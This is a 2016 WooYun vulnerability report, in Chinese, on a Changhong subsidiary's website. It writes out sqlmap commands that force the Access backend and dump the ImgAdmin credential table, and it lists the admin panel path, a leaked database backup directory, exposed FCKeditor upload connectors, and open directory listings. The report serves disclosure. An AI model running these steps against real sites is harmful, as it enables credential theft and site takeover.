漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0175803
漏洞标题:电器安全之长虹电器子公司存在SQL注入、敏感信息泄露等多处漏洞(sqlmap无法判断数据库时, 无法找到管理表名时案例)
相关厂商:changhong.com
漏洞作者: crown丶prince
提交时间:2016-02-14 20:01
修复时间:2016-02-22 09:00
公开时间:2016-02-22 09:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-02-14: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
电器安全之长虹电器子公司存在SQL注入、敏感信息泄露等多处漏洞(sqlmap无法判断数据库时案例)
PS: 四川长虹格润再生资源有限责任公司(以下简称“格润公司”)是四川长虹电器股份有限公司(以下简称四川长虹)旗下的控股子公司,成立于2010年6月;公司总部位于成都市金堂县,占地170余亩,总投资5亿元。
详细说明:
这是一次奇妙的旅程,首先是一个sql注入
【注入点】:
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274"
手工判断确认是注入了,但是sqlmap却无法判断注入点的数据库类型,也就是无法深入了
看到一堆not很郁闷,根据经验判断网站架构 和 sqlmap在判断Access的时候多进行了一步这两点
猜测数据库时Access
【更换语句】
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274" --dbms=access
【sqlmap表示也认同】
所以,don't give up
然后,没有后台,再次郁闷,可是:
【找后台】
通过目录遍历,http://www.gerunzs.com/products/
找到后台:http://www.gerunzs.com/gerun_admin/admin_index.asp
然后,没有管理员账号密码,又一次郁闷,可是:
【找管理员账号密码】
通过备份数据库泄露:
http://www.gerunzs.com/database/
下载后查看:
管理信息泄露
可是, 账号密码不对,还是进不去
但是,通过查看数据库,猜测数据库结构没有变,数据库的管理信息存放在ImgAdmin,尝试一下
【再次更换语句】
python sqlmap.py -u "http://www.gerunzs.com/hrlist.asp?Menu=&label=News&table=New&nid=3274" --dbms=access -T "ImgAdmin" --columns
终于可以获得账号密码了,额,点到为止
【其他漏洞】
【1】FCK对外
http://www.gerunzs.com/fckeditor/
http://www.gerunzs.com/fckeditor/editor/
http://www.gerunzs.com/fckeditor/editor/filemanager/connectors/asp/
http://www.gerunzs.com/fckeditor/editor/dialog/
http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/browser.html
http://www.gerunzs.com/fckeditor/editor/filemanager/browser/default/frmupload.html
editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php
【2】目录遍历
http://www.gerunzs.com/test/
http://www.gerunzs.com/products/
http://www.gerunzs.com/images/
漏洞证明:
修复方案:
版权声明:转载请注明来源 crown丶prince@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-02-22 09:00
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无